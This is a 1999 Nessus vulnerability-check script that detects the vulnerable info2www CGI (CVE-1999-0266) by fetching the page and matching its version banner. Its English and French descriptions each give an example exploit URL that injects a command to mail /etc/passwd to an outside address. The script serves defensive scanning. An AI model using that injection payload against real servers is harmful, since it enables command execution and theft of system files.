 #
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10127);
 script_version ("$Revision: 1.14.2.1 $");
 script_bugtraq_id(1995);
 script_cve_id("CVE-1999-0266");
 name["english"] = "info2www";
 name["francais"] = "info2www";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "The 'info2www' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Example:

http://target/cgi-bin/info2www?'(../../../bin/mail your@email < /etc/passwd|)'

Solution : Remove it from /cgi-bin or upgrade.

Risk factor : Serious";


 desc["francais"] = "Le cgi 'info2www' est install. Celui-ci possde
un problme de scurit bien connu qui permet  n'importe qui de faire
executer des commandes arbitraires au daemon http, avec les privilges
de celui-ci (root ou nobody). 

Pour exploiter ce problme, faites simplement une requete telle que :

http://target/cgi-bin/info2www?'(../../../bin/mail your@email < /etc/passwd|)'


Solution : retirez-le de /cgi-bin.

Facteur de risque : Srieux";


 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Checks for the presence of /cgi-bin/info2www";
 summary["francais"] = "Vrifie la prsence de /cgi-bin/info2www";
 
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_GATHER_INFO);
 
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
		francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
port = get_kb_item("Services/www");
if(!port) port = 80;
if(!get_port_state(port))exit(0);
if(http_is_dead(port:port))exit(0);


req = http_get(item:string(cgibin(), "/info2www"), port:port);
soc = http_open_socket(port);
if(!soc)exit(0);
send(socket:soc, data:req);
rep = http_recv(socket:soc);
http_close_socket(soc);
if(egrep(pattern:".*generated by info2www 1\.[01][^0-9].*", string:rep))security_hole(port);

